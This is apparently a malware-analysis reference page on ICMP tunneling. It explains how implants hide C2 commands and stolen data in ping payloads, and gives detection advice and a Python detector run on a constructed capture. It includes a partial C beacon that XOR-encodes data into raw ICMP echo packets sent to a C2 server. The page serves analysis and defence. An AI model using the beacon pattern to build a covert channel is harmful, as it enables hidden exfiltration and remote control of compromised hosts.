ICMP Tunneling
Malware smuggles C2 commands and data inside ICMP echo payloads, riding a non-application-layer protocol many networks pass without inspection.
ICMP is a control protocol — ping and traceroute live here — and it is frequently allowed outbound with little or no inspection, since blocking it breaks legitimate diagnostics. ICMP tunneling abuses the fact that an echo request (type 8) and its echo reply (type 0) both carry an arbitrary data field. Malware stuffs commands, responses, and exfiltrated bytes into that payload, turning ordinary-looking pings into a bidirectional covert channel that bypasses application-layer proxies entirely.
The channel is attractive precisely because it operates below the application layer: there is no URL, no TLS SNI, no DNS query for a content filter to inspect. Throughput is modest and the traffic is connectionless, so ICMP tunneling tends to be used for stealthy command exchange and slow exfiltration rather than bulk transfer. Pingback used ICMP echo data for its C2, the icmpsh family provides a reverse ICMP shell, and APT41's LOWKEY supported an ICMP-based variant.
For an analyst the task is to recognise that a sample crafts raw ICMP packets, recover how it frames and encodes the payload, and decode captured echo traffic to read both sides of the conversation.
How it works
The implant builds raw ICMP echo packets, places encoded C2 data in the payload, and the operator replies in kind, reusing the identifier so the OS pairs request and reply:
```c
// Illustrative ICMP framing — descriptive, not deployable.
// Encoded command/response bytes ride in the echo data field.
// Headers the snippet relies on (added so it compiles as a unit):
#include <stdint.h>
#include <stddef.h>
#include <sys/socket.h>
#include <netinet/ip_icmp.h>

// Helpers the snippet calls but does not define: a sequence counter,
// XOR obfuscation of the payload, and the RFC 1071 one's-complement checksum.
uint16_t next_seq(void);
void xor_encode(const uint8_t *src, size_t n, uint8_t *dst, uint8_t key);
uint16_t inet_csum(const void *buf, size_t len);

void icmp_beacon(int raw_sock, struct sockaddr *c2,
                 const uint8_t *data, size_t len)
{
    uint8_t pkt[1500];
    struct icmphdr *h = (struct icmphdr *)pkt;
    h->type = ICMP_ECHO;                // type 8, looks like ping
    h->code = 0;
    h->un.echo.id = 0x1337;             // fixed id pairs the session
    h->un.echo.sequence = next_seq();   // sequencing for reassembly
    // payload carries obfuscated tasking/response, not "abcdef..."
    size_t n = (len > 1400) ? 1400 : len;
    xor_encode(data, n, pkt + sizeof *h, 0x5A);
    h->checksum = 0;
    h->checksum = inet_csum(pkt, sizeof *h + n);
    sendto(raw_sock, pkt, sizeof *h + n, 0, c2, sizeof(struct sockaddr));
}
```

The C2 listener decodes the echo data, executes the command, and returns output inside echo replies. Tells for a reverser: creation of a raw socket (SOCK_RAW with IPPROTO_ICMP, which usually requires elevated privileges), manual ICMP header construction, a fixed echo identifier, a checksum routine, and an encode/decode step applied to the payload — benign ping utilities never obfuscate their data field or carry high-entropy bytes there.
Detection & analysis
Static analysis:
- Look for raw-socket setup (`socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)` on Linux; `IcmpSendEcho`, Winsock raw sockets or a packet driver on Windows) combined with hand-built ICMP headers. The presence of an ICMP checksum routine and a fixed echo `id` next to an XOR/RC4/base64 step on the payload is the defining static marker.
- Recover the encoding key and the framing (sequence handling, any magic bytes or length prefix in the payload). This lets you decode captured echo data offline and read both tasking and exfiltrated output.
- Note the hard-coded C2 address that `sendto` targets — a single fixed destination receiving a stream of echo requests reveals the server.
Dynamic analysis:
- Capture ICMP in a sandbox and inspect the echo data field. Benign pings use a small, fixed, low-entropy padding pattern; tunneling shows variable-length, high-entropy, or printable-but-structured payloads, frequently larger than the OS default ping size.
- Measure echo volume and directionality: a sustained, two-way stream of echo request/reply to a single external host — especially with a constant identifier and payloads that change every packet — is anomalous for any normal diagnostic use.
- Decode the captured payloads with the reversed encoder to reconstruct the commands and any exfiltrated data.
Detection rule hint:
Alert when a host exchanges a sustained bidirectional stream of ICMP echo request/reply with a single external peer where the payload length deviates from the OS default and the data field carries high Shannon entropy or non-repeating content — abnormal, high-entropy, variable echo payloads to one destination are the hallmark of an ICMP tunnel, never of legitimate ping.
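The rule above, applied to a constructed capture as an added example (not code from the original page): flows are keyed by requester, responder and echo id, and a flow is flagged only when it is sustained and two-way, its echo data deviates from the default size, and the data is high-entropy or never repeats. The default sizes (56 bytes for Linux iputils ping, 32 for Windows), the entropy threshold and the packet minimum are assumptions to tune per environment.

```python
import math, struct
from collections import defaultdict

ICMP_ECHO_REPLY, ICMP_ECHO = 0, 8
# Assumptions: default echo data is 56 bytes (Linux iputils ping) or 32 (Windows);
# the entropy threshold and minimum packet count are tunable starting points.
DEFAULT_PAYLOAD_SIZES, ENTROPY_THRESHOLD, MIN_PACKETS = {56, 32}, 6.0, 4

def shannon_entropy(data):
    """Bits of entropy per byte of data (0.0 for empty input)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data))) if n else 0.0
def parse_icmp(raw):
    """Split a raw ICMP message into header fields and the echo data field."""
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "data": raw[8:]}
def flag_icmp_tunnels(packets):
    """packets: iterable of (src_ip, dst_ip, raw_icmp_bytes). Returns one tuple
    (flow key, packet count, max entropy, non_repeating) per flow matching the rule."""
    flows = defaultdict(list)
    for src, dst, raw in packets:
        msg = parse_icmp(raw)
        if msg["type"] not in (ICMP_ECHO, ICMP_ECHO_REPLY):
            continue
        # Key replies by (requester, responder, id) so both directions share one flow.
        key = (src, dst, msg["id"]) if msg["type"] == ICMP_ECHO else (dst, src, msg["id"])
        flows[key].append(msg)
    hits = []
    for key, msgs in flows.items():
        payloads = [m["data"] for m in msgs]
        if len(msgs) < MIN_PACKETS or {m["type"] for m in msgs} != {ICMP_ECHO, ICMP_ECHO_REPLY}:
            continue  # not a sustained, two-way exchange
        if all(len(p) in DEFAULT_PAYLOAD_SIZES for p in payloads):
            continue  # default-sized echoes: ordinary ping is left alone
        max_entropy = max(shannon_entropy(p) for p in payloads)
        non_repeating = len(set(payloads)) == len(payloads)
        if max_entropy >= ENTROPY_THRESHOLD or non_repeating:
            hits.append((key, len(msgs), round(max_entropy, 2), non_repeating))
    return hits
def build_echo(icmp_type, ident, seq, data):  # constructed message; checksum left at zero
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + data

# Constructed capture: an ordinary ping session (iputils-style 56-byte data: timestamp
# then the 0x10..0x3f pattern) beside a tunnel-like session carrying 200 varying bytes.
_benign = lambda i: struct.pack("!Q", 1700000000 + i) + bytes(range(0x10, 0x40))
_tunnel = lambda i: bytes((k * 31 + i * 17) & 0xFF for k in range(200))
SAMPLE_PACKETS = [pkt for i in range(3) for pkt in (
    ("10.0.0.5", "192.0.2.1", build_echo(ICMP_ECHO, 0x1234, i, _benign(i))),
    ("192.0.2.1", "10.0.0.5", build_echo(ICMP_ECHO_REPLY, 0x1234, i, _benign(i))),
    ("10.0.0.7", "203.0.113.9", build_echo(ICMP_ECHO, 0x1337, i, _tunnel(2 * i))),
    ("203.0.113.9", "10.0.0.7", build_echo(ICMP_ECHO_REPLY, 0x1337, i, _tunnel(2 * i + 1))))]
```

Only the second session is reported: its echoes are two-way, 200 bytes long, and every payload is distinct, while the default-sized ping session is skipped even though its timestamp makes each packet differ.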